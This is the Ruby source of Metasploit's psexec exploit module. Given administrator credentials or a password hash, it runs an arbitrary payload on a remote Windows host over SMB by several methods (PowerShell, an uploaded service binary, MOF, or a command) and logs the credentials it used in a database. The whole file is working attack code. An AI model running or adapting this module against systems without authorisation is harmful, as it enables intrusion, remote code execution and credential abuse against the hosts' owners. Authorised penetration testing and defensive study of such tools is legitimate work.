Path: blob/master/modules/exploits/windows/smb/psexec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Windows XP systems that are not part of a domain default to treating all
# network logons as if they were Guest. This prevents SMB relay attacks from
# gaining administrative access to these systems. This setting can be found
# under:
#
# Local Security Settings >
# Local Policies >
# Security Options >
# Network Access: Sharing and security model for local accounts

# Authenticated SMB code execution in the style of SysInternals' psexec.
# The SMB transport, service-control, PowerShell, EXE and WMI/MOF plumbing
# all come from the mixins below; this file only holds option handling,
# target selection and credential reporting.
class MetasploitModule < Msf::Exploit::Remote
  # Manual: requires valid administrative credentials supplied by the operator.
  Rank = ManualRanking

  include Msf::Exploit::Remote::SMB::Client::Psexec
  include Msf::Exploit::Powershell
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Auxiliary::Report
  # Allows reuse of an existing SMB session instead of a fresh connection
  # (see create_simple_smb_client!).
  include Msf::OptionalSession::SMB

  # Module metadata plus the SMBSHARE option (aliased SHARE) and the advanced
  # options read elsewhere in this file: ALLOW_GUEST, SERVICE_FILENAME,
  # PSH_PATH and SERVICE_STUB_ENCODER.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Windows Authenticated User Code Execution',
      'Description'    => %q{
          This module uses a valid administrator username and password (or
        password hash) to execute an arbitrary payload. This module is similar
        to the "psexec" utility provided by SysInternals. This module is now able
        to clean up after itself. The service created by this tool uses a randomly
        chosen name and description.
      },
      'Author'         =>
        [
          'hdm',
          'Royce Davis <rdavis[at]accuvant.com>', # (@R3dy__) PSExec command module
          'RageLtMan <rageltman[at]sempervictus>' # PSH exploit, libs, encoders
        ],
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'WfsDelay'  => 10,
          'EXITFUNC'  => 'thread'
        },
      'References'     =>
        [
          [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
          [ 'OSVDB', '3106'],
          [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ],
          [ 'URL', 'https://www.optiv.com/blog/owning-computers-without-shell-access' ],
          [ 'URL', 'http://sourceforge.net/projects/smbexec/' ]
        ],
      'Payload'        =>
        {
          'Space'       => 3072,
          'DisableNops' => true
        },
      'Platform'       => 'win',
      # Target names are matched literally by exploit's case statement.
      'Targets'        =>
        [
          [ 'Automatic', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
          [ 'PowerShell', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
          [ 'Native upload', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
          [ 'MOF upload', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
          # Command target overrides the payload space limit set above.
          [ 'Command', { 'Arch' => [ARCH_CMD], 'Payload' => { 'Space' => 8191 } } ]
        ],
      'DefaultTarget'  => 0,
      # For the CVE, PsExec was first released around February or March 2001
      'DisclosureDate' => '1999-01-01'
    ))

    register_options(
      [
        # Empty default: exploit picks ADMIN$ (or C$ for the Command target).
        OptString.new('SMBSHARE', [false, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", ''], aliases: ['SHARE'])
      ])

    register_advanced_options(
      [
        # Off by default: a Guest-only logon aborts in create_simple_smb_client!.
        OptBool.new('ALLOW_GUEST', [true, 'Keep trying if only given guest access', false]),
        # nil default: native_upload_with_workaround generates a random name.
        OptString.new('SERVICE_FILENAME', [false, 'Filename to to be used on target for the service binary', nil]),
        # Relative to the share root; used by powershell_installed? in the Automatic target.
        OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']),
        # Validated up front by validate_service_stub_encoder!.
        OptString.new('SERVICE_STUB_ENCODER', [false, 'Encoder to use around the service registering stub', nil])
      ])
  end

  # Uploads the service binary to +smbshare+ via the Psexec mixin's
  # native_upload. The filename falls back to a random 8-letter name with an
  # .exe suffix and the stub encoder to an empty string when unset. On a peer
  # reporting "Windows 5.1" (Windows XP, per the note below) the connection is
  # re-established as SMB1 and re-authenticated first.
  def native_upload_with_workaround(smbshare)
    service_filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
    service_encoder = datastore['SERVICE_STUB_ENCODER'] || ''

    # Avoid implementing NTLMSSP on Windows XP
    # https://seclists.org/metasploit/2009/q1/6
    if smb_peer_os == "Windows 5.1"
      connect(versions: [1])
      smb_login
    end
    native_upload(smbshare, service_filename, service_encoder)
  end

  # Fails fast when SERVICE_STUB_ENCODER names an encoder the framework does
  # not know. A nil or empty value means "no encoder" and is accepted.
  #
  # Raises Msf::OptionValidateError keyed on the option name.
  def validate_service_stub_encoder!
    service_encoder = datastore['SERVICE_STUB_ENCODER']
    return if service_encoder.nil? || service_encoder.empty?

    encoder = framework.encoders[service_encoder]
    if encoder.nil?
      raise Msf::OptionValidateError.new(
        {
          'SERVICE_STUB_ENCODER' => "Failed to find encoder #{service_encoder.inspect}"
        }
      )
    end
  end

  # Main entry point: validates options, picks the share, establishes the SMB
  # client and dispatches on the selected target name, then runs the payload
  # handler and disconnects.
  def exploit
    validate_service_stub_encoder!

    # automatically select an SMB share unless one is explicitly specified
    if datastore['SMBSHARE'] && !datastore['SMBSHARE'].blank?
      smbshare = datastore['SMBSHARE']
    elsif target.name == 'Command'
      smbshare = 'C$'
    else
      smbshare = 'ADMIN$'
    end

    # NOTE(review): on a Guest-only logon without ALLOW_GUEST this disconnects
    # and returns normally; nothing here checks for that before continuing
    # into the target dispatch below — confirm whether that is intended.
    create_simple_smb_client!

    case target.name
    when 'Automatic'
      # PowerShell is preferred when powershell.exe is reachable at PSH_PATH
      # on the chosen share; otherwise fall back to the native service binary.
      if powershell_installed?(smbshare, datastore['PSH_PATH'])
        print_status('Selecting PowerShell target')
        execute_powershell_payload
      else
        print_status('Selecting native target')
        native_upload_with_workaround(smbshare)
      end
    when 'PowerShell'
      execute_powershell_payload
    when 'Native upload'
      native_upload_with_workaround(smbshare)
    when 'MOF upload'
      mof_upload(smbshare)
    when 'Command'
      execute_command_payload(smbshare)
    end

    handler
    disconnect
  end

  # Records the successful SMB logon in the credential database: a service
  # entry for RHOST:RPORT/smb, a credential core built from SMBUser/SMBPass
  # (the raw SMBPass value is stored as private_data), and a login marked
  # SUCCESSFUL with access_level 'Admin'.
  def report_auth
    service_data = {
      address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
      port: datastore['RPORT'],
      service_name: 'smb',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: self.fullname,
      private_data: datastore['SMBPass'],
      username: datastore['SMBUser'].downcase
    }

    # Only a non-default domain is recorded as an Active Directory realm.
    if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'
      credential_data.merge!({
        realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
        realm_value: datastore['SMBDomain']
      })
    end

    # A 32-hex:32-hex value is classified as an NTLM hash pair rather than a
    # password. The pattern is unanchored, so a match anywhere in the string
    # counts.
    if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
      credential_data.merge!({:private_type => :ntlm_hash})
    else
      credential_data.merge!({:private_type => :password})
    end

    credential_data.merge!(service_data)

    credential_core = create_credential(credential_data)

    login_data = {
      access_level: 'Admin',
      core: credential_core,
      last_attempted_at: DateTime.now,
      status: Metasploit::Model::Login::Status::SUCCESSFUL
    }

    login_data.merge!(service_data)
    create_credential_login(login_data)
  end

  # Sets self.simple to a usable SMB client. With an existing session, wraps
  # that session's client; otherwise connects and authenticates with the
  # datastore credentials. On the fresh-connection path a Guest-only logon is
  # rejected unless ALLOW_GUEST is set, and a successful logon with a
  # non-blank SMBUser is reported via report_auth. The session path reports
  # nothing.
  def create_simple_smb_client!
    if session
      print_status("Using existing session #{session.sid}")
      client = session.client
      self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)

    else
      print_status('Connecting to the server...')
      connect

      print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
      smb_login

      # auth_user is falsy when the server downgraded the logon to Guest
      # (see the Windows XP note at the top of this file).
      if !simple.client.auth_user && !datastore['ALLOW_GUEST']
        print_line
        print_error(
          'FAILED! The remote host has only provided us with Guest privileges. ' \
          'Please make sure that the correct username and password have been provided. ' \
          'Windows XP systems that are not part of a domain will only provide Guest privileges ' \
          'to network logins by default.'
        )
        print_line
        disconnect
        # Plain return: the caller receives no failure signal from this path.
        return
      end

      unless datastore['SMBUser'].to_s.strip.empty?
        report_auth
      end

    end
  end
end